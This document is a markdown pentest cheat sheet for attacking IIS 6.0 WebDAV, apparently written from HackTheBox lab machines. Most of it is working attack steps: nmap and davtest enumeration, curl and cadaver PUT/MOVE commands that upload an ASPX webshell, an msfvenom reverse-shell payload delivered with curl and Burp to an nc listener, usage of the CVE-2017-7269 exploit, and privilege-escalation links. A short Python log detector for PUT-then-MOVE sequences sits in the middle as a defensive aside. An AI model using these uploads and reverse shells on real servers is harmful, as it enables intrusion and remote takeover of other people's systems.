# IIS6 WebDav

## Microsoft Windows 2003|2008|XP

* google 'iis 6.0 reverse shell'
* Microsoft-IIS/6.0
* http-webdav-scan
* WebDAV allows clients to perform Web authoring operations remotely.
* REF: [Granny/Grandpa-HTB](/04-webapps/iis6-webdav.md)
* [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases)

## nmap finds webdav

* **nmap -sV -sC -oA nmap 10.x.x.x**
* Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
* Options: OPTIONS, TRACE, **GET**, HEAD, DELETE, **PUT**, POST, COPY, **MOVE**
* GET - download
* PUT - upload
* MOVE - you can rename/move

## davtest

```
> davtest -url http://10.x.x.x
```

## cadaver

```
> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok
```

## PUT/MOVE

* Scenario:
  * Can 'put' text - upload
  * NOT 'put' aspx
  * Can 'move' aspx

```
------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444
```
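From the defender's side, the PUT-then-MOVE sequence above shows up in IIS W3C logs as a successful PUT followed by a MOVE of the same URI from the same client, often next to a 403 on a direct script upload. The following Python is an added example, not part of the original notes: the log lines are constructed, the field subset and the `SCRIPT_EXTS` list are assumptions, and it correlates on the MOVE's source URI because the fields used here do not carry the Destination header.

```python
# Added example: flag WebDAV PUT-then-MOVE sequences in IIS W3C logs.
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".cer")  # assumption: script-mapped extensions

# Constructed sample log (documentation addresses, not from a real host).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 GET /index.htm 200
2024-01-01 10:00:05 198.51.100.7 PUT /shell.aspx 403
2024-01-01 10:00:09 198.51.100.7 PUT /shell.txt 201
2024-01-01 10:00:12 198.51.100.7 MOVE /shell.txt 201
2024-01-01 10:00:15 198.51.100.7 GET /shell.aspx 200
2024-01-01 10:01:00 192.0.2.10 PUT /docs/notes.txt 201
"""

def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_put_move(text):
    """Return findings: blocked script uploads and PUT followed by MOVE from one client."""
    uploaded = set()   # (client, uri) pairs created by a successful PUT
    findings = []
    for r in parse_w3c(text):
        key = (r["c-ip"], r["cs-uri-stem"].lower())
        ok = r["sc-status"].startswith("2")
        if r["cs-method"] == "PUT":
            if ok:
                uploaded.add(key)
            elif key[1].endswith(SCRIPT_EXTS):
                findings.append(("blocked-script-put", *key))
        elif r["cs-method"] == "MOVE" and ok and key in uploaded:
            findings.append(("put-then-move", *key))
    return findings

if __name__ == "__main__":
    for f in find_put_move(SAMPLE_LOG):
        print(f)
```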

## Burp

```
Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!
```

## iis6-exploit

* CVE-2017-7269
* iis\_shell.py
* iis6-exploit-2017-CVE-2017-**7269**
* <https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269>
* usage: iis6webdav.py RHOST RPORT LHOST LPORT

```
> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444
```

## Windows 2003

Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:\
<https://www.exploit-db.com/exploits/6705/>


